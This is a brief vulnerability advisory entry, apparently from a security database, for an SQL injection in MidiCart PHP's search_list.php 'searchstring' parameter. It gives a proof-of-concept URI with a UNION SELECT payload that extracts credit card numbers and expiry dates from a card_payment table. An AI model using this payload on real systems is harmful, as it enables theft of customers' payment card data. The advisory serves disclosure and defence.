|
MidiCart PHP Search_List.PHP SearchString Parameter SQL Injection Vulnerability
No exploit is required. The following proof of concept URI is available: http://www.example.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment |
|
|
Privacy Statement |